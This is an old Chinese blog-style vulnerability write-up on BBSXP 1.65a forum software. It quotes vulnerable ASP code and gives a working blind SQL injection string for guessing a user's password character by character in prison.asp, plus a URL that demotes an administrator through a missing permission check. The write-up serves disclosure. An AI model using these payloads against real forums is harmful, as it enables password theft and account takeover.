新BBSXP漏洞[倒着看三]

2008-04-09 04:11:02来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折


最新BBSXP漏洞[倒着看三] 其实躺在床上看代码也是一件非常惬意的事情,特别是看那些写得很烂的东西时候,
你总莫名其妙地产生一种居高临下的感觉。在过了一个痛苦不堪的暑假后,尤其是在生病
后急需要调整心情的那段时间里,看BBSXP几乎成了我唯一的享受。
依然是BBSXP1.65a,依然是业余级别的代码和洞。

recycle.asp行16、17。这是一个要管理员或者社区区长才能利用漏洞,代码如下:

for each ho in request.form("id")
conn.execute("update [forum] set
deltopic=0,lasttime=now,content=content&'<br><br>[此帖子已
被 "&Request.Cookies("username")&" 在 "&now&" 还原过]' where id="&ho&"
and deltopic=1")
next

对于MSSQL版(如果地球上存在的话)的来说,这个的利用难度是零。但是对于
ACCESS版的要利用这个猜密码玩的话,难度是很大的,因为不好判断条件正确与否,姑且
就把这个洞的利用放掉吧。

prison.asp行28同样是一个要管理员或者社区区长才能利用漏洞,代码是这样的:

sql="select * from user where username='"&Request("username")&"'"

我把这个洞称作愚蠢的,第一是因为幼稚的写法,第二是因为在这个尔虞我诈的社
会,你永远不知道同样身为管理员的他是否会在背后捅你一刀,轻率地写那些只有管理员
才有权访问的代码,同样会增加整个论坛的脆弱性。
一句老话,对于MSSQL版(如果地球上确实存在的话)的来说,这个的利用难度是零,
而对于准备猜密码的人来说,难度就像是让中国跳水队在一米板上做301B。
进入prison.asp,用户名上面填写的就是我们要注入的东西,理由随便。比如我们来
猜猜never的密码,当然,我自己是知道的密码的,这里只是假装不知道。
要填写的东西基本上就不用考虑,猜never的密码第一位最好的格式是这样:

select * from user where username='never' and right(left(userpass,1),1)
='x'

比较一下prison.asp第28行,简直就是量身定做,提交的用户名就这样就好了

never' and right(left(userpass,1),1)='x

never的密码第一位是1,我提交的不正确的话,比如提交的就是never' and right
(left(userpass,1),1)='2,那么BBSXP会傻乎乎的告诉我这个用户资料不存在,呵呵,
很显然,这个的查询结果是空,当然没有资料存在了。如果我猜的不是2而是1,回来的资
料就不太一样,这里never是社区社长,不能被关进监狱,因为这个查询结果正好就是
never,所以BBSXP告诉我们不能抓入监狱。当然,猜不同的人的密码情况可能不太一样,
反正如果返回结果是用户资料不存在,你就是猜错了,否则你就猜对了。
同样的洞在同样的文件中有很多个拷贝,我就不一一列举了,下面再说一个搞笑的漏
洞。

同样的文件,行71到89是这样的

if Request("menu")="release" then
sql="select * from user where username='"&Request.Cookies("username")&"'"
rs.Open sql,Conn
if rs("membercode") < 4 then
error("<li>您的权限不够,无法释放犯人!")
end if

if Request.Cookies("userpass")<>rs("userpass") then
error("<li>您的密码错误")
end if

rs.close
conn.execute("update [user] set membercode=1 where username='"&Request
("username")&"'")
conn.execute("delete from [prison] where username='"&Request("username")
&"'")

response.redirect "prison.asp"
end if

我为什么要说怕别人在背后摆你一道呢,就是这里了。我要是管理员,我可以让任何
人进监狱!这里没有检查要释放的人是不是在监狱里面,我要是弄了一个不是在监狱里面
的人提交过去,马上就把他打为平民了,因为有这句话:

conn.execute("update [user] set membercode=1 where username='"&Request
("username")&"'")

比如我是never,test是管理员,但是我很看不惯它这个小子。我登陆后在浏览器中
输入

http://localhost/bbsxp/prison.asp?menu=release&username=test

咔嚓,test变成平头老百姓了,然后我按照正常的手段就可以把他弄进监狱里面去。
哦,可怜的test,他还不知道世道如此险恶。

总而言之,这个论坛是极其搞笑的,任何的自夸之语只能授人以笑柄。什么叫“一般
你只要自己设置一下,不用升级我们的程序,你就可以永远排除这种漏洞”,我都不好意
思读出来,就是这样的论坛,这样的代码,就是猴子听了都会脸红。后面一个漏洞充分的
体现了编写者的思维混乱,我都不能说他们是外行,因为我身边的非计算机系DDMM们才大
一大二,他们都有严谨的思维方式,而且写出来的代码简洁有力,我怕这样说会伤了DDMM
们的心,他们才是真正的外行啊!BBSXP的人呢?你们算是什么呢?
关闭本页

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Opera7五个Dos漏洞

下一篇:浪客联盟的文章管理的密码